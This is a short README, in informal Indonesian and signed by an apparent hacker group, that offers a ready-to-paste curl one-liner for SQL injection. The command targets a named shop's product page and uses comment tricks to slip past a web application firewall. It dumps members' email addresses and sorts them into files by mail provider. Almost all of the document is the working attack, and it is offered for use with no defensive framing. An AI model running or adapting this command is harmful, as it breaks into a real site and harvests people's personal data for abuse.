└── README.md /README.md: -------------------------------------------------------------------------------- 1 | # Extract-data-with-SQLi (curl & grep) 2 | 3 | PERTAMA :. 4 | Inject manual seperti biasa dengan dios yg uda nampilin all email 5 | 6 | Langsung replace dengan target yg uda didios mode dump data ya 7 | 8 | Paste di terminal bungurasih ya :v 9 | 10 | ``` 11 | curl --silent "http://m.sweetyboutique.com/product-detail.php?id=13584+and+0+/*"\!"00000UNION*/+SELECT+1,(select(@x)from(select(@x:=0x00),(select(0)from(tmember)where(@x:=/*"\!"00000concat*/(@x,0x3c62723e,email))))x),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--+" >> tmp;grep -o '[[:alnum:]+\.\_\-]*@[[:alnum:]+\.\_\-]*' "tmp" | sort | uniq -i > list;echo "";echo "Total Dumped : `wc -l list`";for i in gmail yahoo aol hotmail;do cat list | grep $i > $i.txt;echo "[+] `wc -l $i.txt`";done;cat list | grep -v gmail | grep -v yahoo | grep -v aol | grep -v hotmail > others.txt;echo "[+] others : `wc -l others.txt`";rm tmp; 12 | 13 | ``` 14 | 15 | NB (penting) : 16 | klo utk smisal ada waf yg perlu pake /*! Comment */ 17 | Tanda ```!``` Harus diginiin ```"\!"``` ya 18 | 19 | Result : 20 | 21 | Lgsg berbentuk txt sort by kandang (gmail,aol,dll) 22 | 23 | Keep simple 24 | 25 | Versailles ~ Cans21 26 | 27 | Sec7or Team - Surabaya Hacker Link 28 | --------------------------------------------------------------------------------